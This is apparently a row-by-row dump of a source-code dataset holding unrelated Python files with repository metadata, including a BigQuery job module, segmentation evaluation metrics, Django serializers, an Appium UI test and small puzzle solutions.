('PettTHE.py', 14), ('MarrFDI3.py', 7), ('PeckJNG.py', 19), ('BailJD2.py', 5), ('AubePRP.py', 21), ('GellWPT.py', 10), ('AdamWEP.py', 7), ('FitzRNS3.py', 37), ('WilbRLW2.py', 10), ('ClarGE2.py', 54), ('GellWPT2.py', 7), ('WilkJMC2.py', 5), ('CarlTFR.py', 93), ('SeniNSP.py', 4), ('LyttELD.py', 1), ('CoopJBT2.py', 1), ('GrimSLE.py', 1), ('RoscTTI3.py', 2), ('AinsWRR3.py', 4), ('CookGHP2.py', 4), ('KiddJAE.py', 6), ('RoscTTI2.py', 2), ('CoolWHM.py', 27), ('MarrFDI2.py', 2), ('CrokTPS.py', 7), ('ClarGE.py', 47), ('LandWPA.py', 1), ('BuckWGM.py', 13), ('IrviWVD.py', 9), ('LyelCPG.py', 41), ('GilmCRS.py', 5), ('DaltJMA.py', 12), ('WestJIT2.py', 23), ('DibdTRL2.py', 17), ('AinsWRR.py', 2), ('CrocDNL.py', 9), ('MedwTAI.py', 18), ('WadeJEB.py', 38), ('FerrSDO2.py', 2), ('TalfTIT.py', 1), ('NewmJLP.py', 3), ('GodwWLN.py', 10), ('CoopJBT.py', 1), ('KirbWPW2.py', 6), ('SoutRD2.py', 4), ('BackGNE.py', 22), ('LeakWTI4.py', 29), ('LeakWTI.py', 26), ('MedwTAI2.py', 9), ('BachARE.py', 133), ('SoutRD.py', 6), ('DickCSG.py', 1), ('BuckWGM2.py', 2), ('WheeJPT.py', 27), ('MereHHB3.py', 37), ('HowiWRL2.py', 14), ('BailJD3.py', 1), ('MereHHB.py', 31), ('WilkJMC.py', 24), ('HogaGMM.py', 15), ('MartHRW.py', 9), ('MackCNH.py', 11), ('WestJIT.py', 16), ('BabbCEM.py', 25), ('FitzRNS4.py', 21), ('CoolWHM3.py', 14), ('DequTKM.py', 9), ('FitzRNS.py', 47), ('BentJRP.py', 3), ('LyttELD3.py', 2), ('RoscTTI.py', 11), ('ThomGLG.py', 11), ('StorJCC.py', 16), ('KembFJ2.py', 20), ('LewiMJW.py', 20), ('BabbCRD.py', 3), ('MackCNH2.py', 13), ('JacoWHI2.py', 34), ('SomeMMH.py', 8), ('HaliTBC.py', 1), ('WilbRLW3.py', 20), ('MereHHB2.py', 13), ('BrewDTO.py', 2), ('JacoWHI.py', 29), ('ClarGE3.py', 31), ('RogeSIP.py', 10), ('MartHRW2.py', 8), ('DibdTRL.py', 19), ('FitzRNS2.py', 43), ('HogaGMM2.py', 5), ('MartHSI.py', 10), ('EvarJSP.py', 7), ('DwigTHH.py', 6), ('NortSTC.py', 1), ('SadlMLP2.py', 4), ('BowrJMM2.py', 4), ('LyelCPG3.py', 11), ('BowrJMM3.py', 3), ('BeckWRE.py', 2), ('TaylIF.py', 5), ('WordWYR.py', 1), ('DibdTBR.py', 1), ('ThomWEC.py', 3), ('KeigTSS.py', 20), ('KirbWPW.py', 4), ('WaylFEP.py', 9), ('ClarGE4.py', 77), ('HowiWRL.py', 16)] | [
"[email protected]"
] | |
bb86e6cf9d5e401f16ddddb0dac811d9f2c57d11 | 950bdea00a3ea4090f5f90716359d9c2668d1695 | /google/cloud/bigquery/job/__init__.py | 4c16d0e20219be2ab776a41c971451cebbbdc381 | [
"Apache-2.0"
] | permissive | akamil-etsy/python-bigquery | a01f19258e3522e459d8472315f9ea8b90dd8784 | cf0b0d862e01e9309407b2ac1a48f0bfe23d520d | refs/heads/master | 2023-07-03T22:15:17.427257 | 2021-08-05T14:59:15 | 2021-08-05T14:59:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,188 | py | # Copyright 2015 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Define API Jobs."""
from google.cloud.bigquery.job.base import _AsyncJob
from google.cloud.bigquery.job.base import _error_result_to_exception
from google.cloud.bigquery.job.base import _DONE_STATE
from google.cloud.bigquery.job.base import _JobConfig
from google.cloud.bigquery.job.base import _JobReference
from google.cloud.bigquery.job.base import ReservationUsage
from google.cloud.bigquery.job.base import ScriptStatistics
from google.cloud.bigquery.job.base import ScriptStackFrame
from google.cloud.bigquery.job.base import UnknownJob
from google.cloud.bigquery.job.copy_ import CopyJob
from google.cloud.bigquery.job.copy_ import CopyJobConfig
from google.cloud.bigquery.job.copy_ import OperationType
from google.cloud.bigquery.job.extract import ExtractJob
from google.cloud.bigquery.job.extract import ExtractJobConfig
from google.cloud.bigquery.job.load import LoadJob
from google.cloud.bigquery.job.load import LoadJobConfig
from google.cloud.bigquery.job.query import _contains_order_by
from google.cloud.bigquery.job.query import DmlStats
from google.cloud.bigquery.job.query import QueryJob
from google.cloud.bigquery.job.query import QueryJobConfig
from google.cloud.bigquery.job.query import QueryPlanEntry
from google.cloud.bigquery.job.query import QueryPlanEntryStep
from google.cloud.bigquery.job.query import ScriptOptions
from google.cloud.bigquery.job.query import TimelineEntry
from google.cloud.bigquery.enums import Compression
from google.cloud.bigquery.enums import CreateDisposition
from google.cloud.bigquery.enums import DestinationFormat
from google.cloud.bigquery.enums import Encoding
from google.cloud.bigquery.enums import QueryPriority
from google.cloud.bigquery.enums import SchemaUpdateOption
from google.cloud.bigquery.enums import SourceFormat
from google.cloud.bigquery.enums import WriteDisposition
# Include classes previously in job.py for backwards compatibility.
__all__ = [
"_AsyncJob",
"_error_result_to_exception",
"_DONE_STATE",
"_JobConfig",
"_JobReference",
"ReservationUsage",
"ScriptStatistics",
"ScriptStackFrame",
"UnknownJob",
"CopyJob",
"CopyJobConfig",
"OperationType",
"ExtractJob",
"ExtractJobConfig",
"LoadJob",
"LoadJobConfig",
"_contains_order_by",
"DmlStats",
"QueryJob",
"QueryJobConfig",
"QueryPlanEntry",
"QueryPlanEntryStep",
"ScriptOptions",
"TimelineEntry",
"Compression",
"CreateDisposition",
"DestinationFormat",
"Encoding",
"QueryPriority",
"SchemaUpdateOption",
"SourceFormat",
"WriteDisposition",
]
| [
"[email protected]"
] | |
a97f5084296f2d3ee5ab642a3f8b277181382173 | 8aa8d7f742eaba0f89d70ef42918e076be01bae6 | /YR/week3/problem263.py | 30a7b99b382dedbb7fbb099f89f217a9af37700a | [] | no_license | robin9804/RoadToDeepLearningKing | d88a49995b836cb49ce680a0d385a1bb2ae87e99 | fe8695b0d8d7beb5d64d450806e7866a3b103875 | refs/heads/main | 2023-03-19T03:10:16.223113 | 2021-03-11T07:31:09 | 2021-03-11T07:31:09 | 325,275,554 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 545 | py | # problem 263
N, M = list(input("enter the ints : ").split())
N, M = int(N), int(M)
def sum_list(l1, l2):
lists = []
for i in l1:
for j in l2:
lists.append(i + j)
return lists
def func(N ,M):
lists = []
if N == 1:
if M in range(1, 7):
return [[M]]
else:
return False
else:
for i in range(1, 7):
if func(N-1, M-i) != False:
lists += sum_list([[i]], func(N-1, M-i))
return lists
print(func(N, M))
print(len(func(N, M))) | [
"[email protected]"
] | |
8b937f748ecd23a5a902c0f78026fc265309d665 | 6bbfd303dbacc21a2443e681aea5c1a1c21b872d | /pytorch/evaluation/evaluation_segm.py | e8c4b838a59872954ed5e09b055df73f0933ccfb | [] | no_license | gregoryperkins/PC-Reg-RT | fbba9d4f9c55b7e2e9068e8f8a55fc1eba3c76a8 | 7d70ca97019cc7ddc374ffd962e0f63391ec181d | refs/heads/main | 2023-09-04T02:58:42.843287 | 2021-10-16T07:19:25 | 2021-10-16T07:19:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,348 | py | import numpy as np
import torch
import SimpleITK as sitk
def GetSD(predict,label):
predict = predict.astype(np.uint8)
label = label.astype(np.uint8)
mask1 = sitk.GetImageFromArray(predict,isVector=False)
mask2 = sitk.GetImageFromArray(label,isVector=False)
hausdorff_distance_filter = sitk.HausdorffDistanceImageFilter()
hausdorff_distance_filter.Execute(mask1, mask2)
ave_distance = hausdorff_distance_filter.GetAverageHausdorffDistance()
idx_predict = np.where(predict!=0)
sum=0
print(np.size(idx_predict[0]))
for i in range(np.size(idx_predict[0])):
mask_temp = np.zeros_like(predict,dtype=np.uint8)
mask_temp[idx_predict[0][i]][idx_predict[1][i]][idx_predict[2][i]]=1
mask_temp = sitk.GetImageFromArray(mask_temp,isVector=False)
hausdorff_distance_filter = sitk.HausdorffDistanceImageFilter()
hausdorff_distance_filter.Execute(mask_temp, mask2)
distance_pixel = hausdorff_distance_filter.GetHausdorffDistance()
sum=sum+np.square(distance_pixel-ave_distance)
result=np.sqrt(sum/np.size(idx_predict[0]))
return result
def Getcontour(img):
image = sitk.GetImageFromArray(img.astype(np.uint8),isVector=False)
filter = sitk.SimpleContourExtractorImageFilter()
image = filter.Execute(image)
image = sitk.GetArrayFromImage(image)
return image.astype(np.uint8)
def GetMaxConponent(img, index=1):
if img.max() < index:
return np.zeros_like(img,dtype=np.uint8)
image = sitk.GetImageFromArray((img == index).astype(np.uint8),isVector=False)
filter = sitk.ConnectedComponentImageFilter()
image = filter.Execute(image)
image = sitk.GetArrayFromImage(image).astype(np.uint8)
maxindex = 0
max_sum = 0
for i in range(1, image.max()+1):
temp = (image == i).sum()
if temp > max_sum:
max_sum = temp
maxindex = i
if maxindex == 0:
return np.zeros_like(img, dtype=np.uint8)
else:
return (image == maxindex).astype(np.uint8) * index
def GrayMorphologicalClosingImage(img):
image = sitk.GetImageFromArray(img.astype(np.uint8),isVector=False)
filter = sitk.GrayscaleMorphologicalClosingImageFilter()
image = filter.Execute(image)
image = sitk.GetArrayFromImage(image)
return image.astype(np.uint8)
def HausdorffDistance(predict, label, index=1):
predict = (predict == index).astype(np.uint8)
label = (label == index).astype(np.uint8)
predict_sum = predict.sum()
label_sum = label.sum()
if predict_sum != 0 and label_sum != 0 :
mask1 = sitk.GetImageFromArray(predict,isVector=False)
mask2 = sitk.GetImageFromArray(label,isVector=False)
hausdorff_distance_filter = sitk.HausdorffDistanceImageFilter()
hausdorff_distance_filter.Execute(mask1, mask2)
result1 = hausdorff_distance_filter.GetHausdorffDistance()
result2 = hausdorff_distance_filter.GetAverageHausdorffDistance()
result = result1,result2
elif predict_sum != 0 and label_sum == 0:
result = 'FP','FP'
elif predict_sum == 0 and label_sum != 0:
result = 'FN','FN'
else:
result = 'TN','TN'
return result
def dice3D(eval_segm, gt_segm, index=1):
'''
eval_segm:the matirx to evaluate
gt_segm: ground truth
'''
if type(eval_segm) == np.ndarray:
eval_segm = torch.from_numpy(eval_segm).byte()
if type(gt_segm) == np.ndarray:
gt_segm = torch.from_numpy(gt_segm).byte()
eps = 1e-6
#assert eval_segm.size == gt_segm.size
#gt_segm = gt_segm.byte()
eval_segm = (eval_segm == index)
sum_eval = eval_segm.sum().item()
gt_segm = (gt_segm == index)
sum_gt = gt_segm.sum().item()
if sum_eval != 0 and sum_gt != 0:
intersection = torch.sum(eval_segm * gt_segm).item()
union = torch.sum(eval_segm).item() + torch.sum(gt_segm).item() + eps
dice_ = 2.0 * intersection / union
elif sum_eval != 0 and sum_gt == 0:
dice_ = 'FP'
elif sum_eval == 0 and sum_gt != 0:
dice_ = 'FN'
else:
dice_ = 'TN'
return dice_
def jaccard(eval_segm, gt_segm, index=1):
'''
eval_segm:the matirx to evaluate
gt_segm: ground truth
'''
if type(eval_segm) == np.ndarray:
eval_segm = torch.from_numpy(eval_segm.copy()).byte()
if type(gt_segm) == np.ndarray:
gt_segm = torch.from_numpy(gt_segm.copy()).byte()
eps = 1e-6
#assert eval_segm.size == gt_segm.size
#gt_segm = gt_segm.byte()
eval_segm[eval_segm != index] = 0
eval_segm[eval_segm == index] = 1
sum_eval = eval_segm.sum().item()
gt_segm[gt_segm != index] = 0
gt_segm[gt_segm == index] = 1
sum_gt = gt_segm.sum().item()
if sum_eval != 0 and sum_gt != 0:
intersection = torch.sum(eval_segm * gt_segm).item()
union = torch.sum(eval_segm).item() + torch.sum(gt_segm).item() - intersection + eps
dice_ = intersection / union
elif sum_eval != 0 and sum_gt == 0:
dice_ = 'FP'
elif sum_eval == 0 and sum_gt != 0:
dice_ = 'FN'
else:
dice_ = 'TN'
return dice_
def pixel_accuracy_ex(eval_segm, gt_segm):
'''
eval_segm,gt_segm should be format of (N_slice,height,width)
'''
assert (eval_segm.shape == gt_segm.shape)
num = eval_segm.shape[0]
result = np.zeros((num), np.float32)
for i in range(num):
result[i] = pixel_accuracy(eval_segm[i, ...], gt_segm[i, ...])
return result.mean()
def mean_accuracy_ex(eval_segm, gt_segm):
'''
eval_segm,gt_segm should be format of (N_slice,height,width)
'''
assert(eval_segm.shape == gt_segm.shape)
num = eval_segm.shape[0]
result = np.zeros((num), np.float32)
for i in range(num):
result[i] = mean_accuracy(eval_segm[i, ...], gt_segm[i, ...])
return result.mean()
def mean_IU_ex(eval_segm, gt_segm):
'''
eval_segm,gt_segm should be format of (N_slice,height,width)
'''
assert (eval_segm.shape == gt_segm.shape)
num = eval_segm.shape[0]
result = np.zeros((num), np.float32)
for i in range(num):
result[i] = mean_IU(eval_segm[i, ...], gt_segm[i, ...])
return result.mean()
def frequency_weighted_IU_ex(eval_segm, gt_segm):
'''
eval_segm,gt_segm should be format of (N_slice,height,width)
'''
assert (eval_segm.shape == gt_segm.shape)
num = eval_segm.shape[0]
result = np.zeros((num), np.float32)
for i in range(num):
result[i] = frequency_weighted_IU(eval_segm[i, ...], gt_segm[i, ...])
return result.mean()
def mean_IU(eval_segm, gt_segm):
'''
(1/n_cl) * sum_i(n_ii / (t_i + sum_j(n_ji) - n_ii))
'''
check_size(eval_segm, gt_segm)
cl, n_cl = union_classes(eval_segm, gt_segm)
_, n_cl_gt = extract_classes(gt_segm)
eval_mask, gt_mask = extract_both_masks(eval_segm, gt_segm, cl, n_cl)
IU = list([0]) * n_cl
for i, c in enumerate(cl):
curr_eval_mask = eval_mask[i, ...]
curr_gt_mask = gt_mask[i, ...]
if (np.sum(curr_eval_mask) == 0) or (np.sum(curr_gt_mask) == 0):
continue
n_ii = np.sum(np.logical_and(curr_eval_mask, curr_gt_mask))
t_i = np.sum(curr_gt_mask)
n_ij = np.sum(curr_eval_mask)
IU[i] = n_ii / (t_i + n_ij - n_ii)
mean_IU_ = np.sum(IU) / n_cl_gt
return mean_IU_
def extract_classes(segm):
cl = np.unique(segm)
n_cl = len(cl)
return cl, n_cl
def union_classes(eval_segm, gt_segm):
eval_cl, _ = extract_classes(eval_segm)
gt_cl, _ = extract_classes(gt_segm)
cl = np.union1d(eval_cl, gt_cl)
n_cl = len(cl)
return cl, n_cl
def check_size(eval_segm, gt_segm):
assert eval_segm.shape == gt_segm.shape
def extract_masks(segm, cl, n_cl):
slices, h, w = segm.shape
masks = np.zeros((n_cl, slices, h, w))
for i, c in enumerate(cl):
masks[i, ...] = segm == c
return masks
def extract_both_masks(eval_segm, gt_segm, cl, n_cl):
eval_mask = extract_masks(eval_segm, cl, n_cl)
gt_mask = extract_masks(gt_segm, cl, n_cl)
return eval_mask, gt_mask
'''
Exceptions
'''
class EvalSegErr(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
| [
"[email protected]"
] | |
7c5e77e8e8708914b94c95c7da9fc3574ad25c8c | a14795a79fd8f39cede7fa5eb86f9717b5c289c2 | /backend/course/api/v1/serializers.py | 977b3866deffb183b0133225485e9b022f8b7e3e | [] | no_license | crowdbotics-apps/dearfuturescientist-21123 | fcdbe95a9cd9e8713198b6accbeeb56aa5b0b2d4 | 5b282411ebaf39580b938f6678afc8a36e34aba4 | refs/heads/master | 2022-12-30T20:23:25.888830 | 2020-10-05T19:00:56 | 2020-10-05T19:00:56 | 301,510,630 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,622 | py | from rest_framework import serializers
from course.models import (
Recording,
Event,
Subscription,
Course,
Group,
Module,
PaymentMethod,
SubscriptionType,
Enrollment,
Lesson,
Category,
)
class LessonSerializer(serializers.ModelSerializer):
class Meta:
model = Lesson
fields = "__all__"
class CategorySerializer(serializers.ModelSerializer):
class Meta:
model = Category
fields = "__all__"
class SubscriptionTypeSerializer(serializers.ModelSerializer):
class Meta:
model = SubscriptionType
fields = "__all__"
class GroupSerializer(serializers.ModelSerializer):
class Meta:
model = Group
fields = "__all__"
class EventSerializer(serializers.ModelSerializer):
class Meta:
model = Event
fields = "__all__"
class RecordingSerializer(serializers.ModelSerializer):
class Meta:
model = Recording
fields = "__all__"
class PaymentMethodSerializer(serializers.ModelSerializer):
class Meta:
model = PaymentMethod
fields = "__all__"
class CourseSerializer(serializers.ModelSerializer):
class Meta:
model = Course
fields = "__all__"
class SubscriptionSerializer(serializers.ModelSerializer):
class Meta:
model = Subscription
fields = "__all__"
class EnrollmentSerializer(serializers.ModelSerializer):
class Meta:
model = Enrollment
fields = "__all__"
class ModuleSerializer(serializers.ModelSerializer):
class Meta:
model = Module
fields = "__all__"
| [
"[email protected]"
] | |
0f20818aacacd277b492468e80b7128771cc7584 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_97/1704.py | 2ef79a2cad74434c186149c67d373ceeab96e152 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 837 | py | def areRecycled(number1, number2):
recycled = False
numero1 = number1
for i in range(len(number2)):
numero1.insert(0,numero1.pop())
if numero1 == number2:
return True
return False
archi = open("C-small-attempt2.in","r")
cant = open("output.dat","w")
cases = int(archi.readline().split()[0])
for i in range(cases):
cont = 0
label = "Case #" + str(i+1) + ": "
numeros = archi.readline().replace('\n','').split(" ")
limInferior = int(numeros[0])
limSuperior = int(numeros[1])
j=limInferior
while j < limSuperior:
k=j+1;
while k<= limSuperior:
if areRecycled(list(str(k)),list(str(j))):
cont = cont + 1
k = k + 1
j = j + 1
label = label + str(cont) + '\n'
cant.writelines(label)
| [
"[email protected]"
] | |
94495ae9bda52bd44a846dc64ca184a3dab2436d | 32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd | /benchmark/KISS/testcase/firstcases/testcase9_006.py | 61760f5dab43c2ef13a77980e6ed785b691254ad | [] | no_license | Prefest2018/Prefest | c374d0441d714fb90fca40226fe2875b41cf37fc | ac236987512889e822ea6686c5d2e5b66b295648 | refs/heads/master | 2021-12-09T19:36:24.554864 | 2021-12-06T12:46:14 | 2021-12-06T12:46:14 | 173,225,161 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,084 | py | #coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'fr.neamar.kiss',
'appActivity' : 'fr.neamar.kiss.MainActivity',
'resetKeyboard' : True,
'androidCoverage' : 'fr.neamar.kiss/fr.neamar.kiss.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
time.sleep(timeout)
p.terminate()
return
def getElememt(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str)
return element
def getElememtBack(driver, str1, str2) :
for i in range(0, 2, 1):
try:
element = driver.find_element_by_android_uiautomator(str1)
except NoSuchElementException:
time.sleep(1)
else:
return element
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str2)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str2)
return element
def swipe(driver, startxper, startyper, endxper, endyper) :
size = driver.get_window_size()
width = size["width"]
height = size["height"]
try:
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
except WebDriverException:
time.sleep(1)
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
return
# testcase006
try :
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
element = getElememt(driver, "new UiSelector().resourceId(\"fr.neamar.kiss:id/menuButton\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"Device settings\")", "new UiSelector().className(\"android.widget.TextView\").instance(2)")
TouchAction(driver).tap(element).perform()
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
else:
print 'OK'
finally:
cpackage = driver.current_package
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"9_006\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
if (cpackage != 'fr.neamar.kiss'):
cpackage = "adb shell am force-stop " + cpackage
os.popen(cpackage) | [
"[email protected]"
] | |
29ef78376dd563998f38b02a60deaeb27c911a9b | ec84daf26e137b46fa77c18750c99e886ce8c6db | /upgradedDiskaun.py | 6022d8d2051d8a0079196415a5c74c9c28432ee3 | [] | no_license | SharvahGobithasan/Kad-Diskaun-F2-ASK | 8eeb272f6f457765c3da42a2293f47b6dc9a4ed1 | 8575769a413daaaea28b62874c0595f5aa31ff6a | refs/heads/master | 2022-10-15T07:44:45.786304 | 2020-06-11T07:49:31 | 2020-06-11T07:49:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,002 | py | '''
sharvah 11/6/2020
'''
from os import system
system('cls') # to clear the screen
kad = input("Masukkan jenis kad diskaun anda:")
x=kad.casefold()
#print(x)
try:
while True:
if x == "kad premium":
mata = int(input("Masukkan mata ganjaran kad anda:"))
if(mata >= 500):
print("Peratus diskaun ialah 50%")
elif(mata >= 400):
print("Peratus diskaun ialah 40%")
elif(mata >= 300):
print("Peratus diskaun ialah 30%")
elif(mata >= 200):
print("Peratus diskaun ialah 20%")
elif (mata >= 100):
print("Peratus diskaun ialah 10%")
else:
print("Maaf mata anda tidak mencukupi untuk mendapat diskaun")
else:
print("Maaf anda memerlukan kad premium untuk mendapat diskaun")
break
except KeyboardInterrupt: # If CTRL+C is pressed, exit cleanly:
system('cls')
print('Bye!')
| [
"[email protected]"
] | |
263ca80ed3ebdcc465692fef40cd71b494ac004c | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03807/s835726532.py | c603899438bd501bb5871b424daa8724dfe35dfc | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | N = int(input())
a = list(map(int,input().split()))
odd = 0
for i in range(N):
if a[i] % 2:
odd += 1
if odd % 2:
print('NO')
else:
print('YES') | [
"[email protected]"
] | |
984769b8bfd917b7f3a450664dda8ca833caabdc | b7f3edb5b7c62174bed808079c3b21fb9ea51d52 | /components/safe_browsing/content/web_ui/DEPS | c4dfe28ac40a5b9fd60086f5f0bb2d45f1b6d99f | [
"BSD-3-Clause"
] | permissive | otcshare/chromium-src | 26a7372773b53b236784c51677c566dc0ad839e4 | 64bee65c921db7e78e25d08f1e98da2668b57be5 | refs/heads/webml | 2023-03-21T03:20:15.377034 | 2020-11-16T01:40:14 | 2020-11-16T01:40:14 | 209,262,645 | 18 | 21 | BSD-3-Clause | 2023-03-23T06:20:07 | 2019-09-18T08:52:07 | null | UTF-8 | Python | false | false | 409 | include_rules = [
"+components/enterprise/common/proto/connectors.pb.h",
"+components/grit/components_resources.h",
"+components/password_manager/core/browser/hash_password_manager.h",
"+components/user_prefs",
"+components/safe_browsing/core/proto/csd.pb.h",
"+components/strings/grit/components_strings.h",
"+components/grit/components_scaled_resources.h",
"+components/safe_browsing_db",
]
| [
"[email protected]"
] | ||
f14fb0928eff57f50aaf3c6b9771a0b547e9facd | 691394498d5324eab8ed5b71682f75c9b4c3d758 | /Problem46_ProjectEuler.py | dee02d2074ab971e1d3eb8a22110d59fd25c741e | [] | no_license | pratyaydeep/Python-programs | 67a1ac640f5a5d2b192011847f120e8c2137eeeb | 99c0427fb3ab18030ee810dc61d9c51fc505da60 | refs/heads/master | 2020-04-13T06:08:29.808713 | 2018-12-08T15:02:07 | 2018-12-08T15:02:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 624 | py | def prime(n):
if n <= 1:
return False
elif n < 9:
for i in range(2,n):
if n % i == 0:
return False
break
else:
return True
else:
for i in range(2,int(n ** 0.5)+1):
if n % i == 0:
return False
break
else:
return True
n = 35
while True:
if prime(n):
n += 2
else:
for i in range(1,int((n/2)**0.5)+1):
if prime(n - 2 * i**2):
break
else:
break
n += 2
print (n) | [
"[email protected]"
] | |
4ef0a26a6bf9821f4d1258569482c2b9781bc3ef | ba5377e5adf9f14944c0827166e3d17bb0aea64e | /26class_04.py | cfeb596a9a586b36d557816a855e3f06d1db0f54 | [] | no_license | ArhamChouradiya/Python-Course | 34aaaa780cdb9beef2722d15c7e1c73dd2053323 | 503f3c3832617b818f061e3db4cd0f5e2ca24f52 | refs/heads/master | 2020-12-06T01:28:01.926712 | 2020-01-07T10:32:55 | 2020-01-07T10:32:55 | 232,300,438 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 318 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Aug 4 13:15:19 2019
@author: arham
"""
class student:
major= "CSE"
def __init__(self,rollno,name):
self.rollno=rollno
self.name=name
s1=student(1,"JOhn")
s2=student(2,"jane")
print(s1.major)
print(student.major) | [
"[email protected]"
] |
Subsets and Splits